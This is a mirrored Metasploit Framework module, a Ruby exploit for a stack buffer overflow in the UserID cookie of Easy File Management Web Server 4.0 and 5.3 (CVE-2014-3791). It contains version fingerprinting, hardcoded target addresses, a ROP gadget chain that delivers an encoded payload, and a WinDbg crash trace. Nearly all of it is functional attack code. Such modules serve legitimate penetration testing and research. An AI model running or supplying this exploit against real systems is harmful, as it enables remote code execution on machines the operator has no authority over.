CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/efs_fmws_userid_bof.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking # Reliable memory corruption

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Easy File Management Web Server Stack Buffer Overflow',

14
      'Description'    => %q{

15
        Easy File Management Web Server v4.0 and v5.3 contains a stack buffer

16
        overflow condition that is triggered as user-supplied input is not

17
        properly validated when handling the UserID cookie. This may allow a

18
        remote attacker to execute arbitrary code.

19
      },

20
      'Author'         =>

21
        [

22
          'superkojiman',  # Vulnerability discovery

23
          'Julien Ahrens', # Exploit

24
          'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module

25
        ],

26
      'License'        => MSF_LICENSE,

27
      'References'     =>

28
        [

29
          ['CVE',   '2014-3791'],

30
          ['OSVDB', '107241'],

31
          ['EDB',   '33610'],

32
          ['BID',   '67542'],

33
          ['URL',   'http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536'],

34
          ['URL',   'http://www.web-file-management.com/']

35
        ],

36
      'Platform'       => 'win',

37
      'Arch'           => ARCH_X86,

38
      'DefaultOptions' =>

39
        {

40
          'EXITFUNC'   => 'process'

41
        },

42
      'Payload'        =>

43
        {

44
          'BadChars'   => "\x00\x0a\x0d;",

45
          'Space'      => 3420 # Lets play it safe

46
        },

47
      'Targets'        =>

48
        [

49
          # Successfully tested efmws.exe (4.0.0.0) / (5.3.0.0) on:

50
          # -- Microsoft Windows XP [Version 5.1.2600]

51
          # -- Microsoft Windows    [Version 6.1.7600]

52
          # -- Microsoft Windows    [Version 6.3.9600]

53
          ['Automatic Targeting', { 'auto' => true }],

54
          ['Efmws 5.3 Universal', { 'Esp' => 0xA445ABCF, 'Ret' => 0x10010101 }],

55
          ['Efmws 4.0 Universal', { 'Esp' => 0xA4518472, 'Ret' => 0x10010101 }],

56
          # 0x10010101 = pop ebx > pop ecx > retn

57
          # 0xA445ABCF = 0x514CF5 push esp > retn 0c

58
          # 0xA4518472 = 0x457452 jmp esp

59
          # From ImageLoad.dll

60
        ],

61
      'DisclosureDate' => '2014-05-20',

62
      'DefaultTarget'  => 0))

63


64
      register_options(

65
        [

66
          OptString.new('TARGETURI', [true, 'The URI path of an existing resource', '/vfolder.ghp'])

67
        ])

68
  end

69


70
  def get_version

71


72
    #

73
    # NOTE: Version 5.3 still reports "4.0" in the "Server" header

74
    #

75


76
    version = nil

77
    res = send_request_raw({'uri' => '/whatsnew.txt'})

78


79
    unless res

80
      vprint_error 'Connection failed'

81
      return nil

82
    end

83


84
    if res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/

85
      version = $1

86
      vprint_status "Found version: #{version}"

87
    elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/

88
      version = $1

89
      vprint_status "Based on Server header: #{version}"

90
    end

91


92
    version

93
  end

94


95
  def check

96
    code = Exploit::CheckCode::Safe

97
    version = get_version

98
    if version.nil?

99
      code = Exploit::CheckCode::Unknown

100
    elsif version == "5.3"

101
      code = Exploit::CheckCode::Appears

102
    elsif version == "4.0"

103
      code = Exploit::CheckCode::Appears

104
    end

105


106
    code

107
  end

108


109
  def exploit

110


111
    #

112
    # Get target version to determine how to reach call/jmp esp

113
    #

114


115
    print_status("Fingerprinting version...")

116
    version = get_version

117


118
    if target.name =~ /Automatic/

119
      if version.nil?

120
        fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")

121
      elsif version =~ /5\.3/

122
        my_target = targets[1]

123
      elsif version =~ /4\.0/

124
        my_target = targets[2]

125
      end

126
      print_good("Version #{version} found")

127
    else

128
      my_target = target

129
      unless version && my_target.name.include?(version)

130
        print_error("The selected target doesn't match the detected version, trying anyway...")

131
      end

132
    end

133


134
    #

135
    # Fu to reach where payload lives

136
    #

137


138
    sploit =  rand_text(80)                # Junk

139
    sploit << [0x1001D8C8].pack("V")       # Push edx

140
    sploit << rand_text(280)               # Junk

141
    sploit << [my_target.ret].pack("V")    # Pop ebx > pop ecx > retn

142
    sploit << [my_target['Esp']].pack("V") # Setup call/jmp esp

143
    sploit << [0x10010125].pack("V")       # Contains 00000000 to pass the jnz instruction

144
    sploit << [0x10022AAC].pack("V")       # Mov eax,ebx > pop esi > pop ebx > retn

145
    sploit << rand_text(8)                 # Filler

146
    sploit << [0x1001A187].pack("V")       # Add eax,5bffc883 > retn

147
    sploit << [0x1002466D].pack("V")       # Push eax > retn

148
    sploit << payload.encoded

149


150
    print_status "Trying target #{my_target.name}..."

151


152
    #

153
    # NOTE: Successful HTTP request is required to trigger

154
    #

155


156
    send_request_cgi({

157
      'uri'    => normalize_uri(target_uri.path),

158
      'cookie' => "SESSIONID=; UserID=#{sploit}; PassWD=;",

159
    }, 1)

160
  end

161
end

162


163
=begin

164


165
#

166
# 0x44f57d This will write UserID up the stack. If the UserID is to large it

167
# will overwrite a pointer which is used later on at 0x468702

168
#

169


170
eax=000007d1 ebx=00000000 ecx=000001f4 edx=016198ac esi=01668084 edi=016198ac

171
eip=0044f57d esp=016197e8 ebp=ffffffff iopl=0         nv up ei pl nz na po nc

172
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202

173
fmws+0x4f57d:

174
0044f57d f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

175
0:004> dd @esi

176
01668084  41414141 41414141 41414141 41414141

177
01668094  41414141 41414141 41414141 41414141

178
016680a4  41414141 41414141 41414141 41414141

179
016680b4  41414141 41414141 41414141 41414141

180
016680c4  41414141 41414141 41414141 41414141

181
016680d4  41414141 41414141 41414141 41414141

182
016680e4  41414141 41414141 41414141 41414141

183
016680f4  41414141 41414141 41414141 41414141

184


185
(c38.8cc): Access violation - code c0000005 (first chance)

186
First chance exceptions are reported before any exception handling.

187
This exception may be expected and handled.

188
eax=00000000 ebx=00000000 ecx=015198fc edx=41414141 esi=015198ec edi=015198fc

189
eip=00468702 esp=015197c0 ebp=ffffffff iopl=0         nv up ei pl nz na pe nc

190
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206

191
fmws+0x68702:

192
00468702 ff5228          call    dword ptr [edx+28h]  ds:0023:41414169=????????

193


194
=end

195


196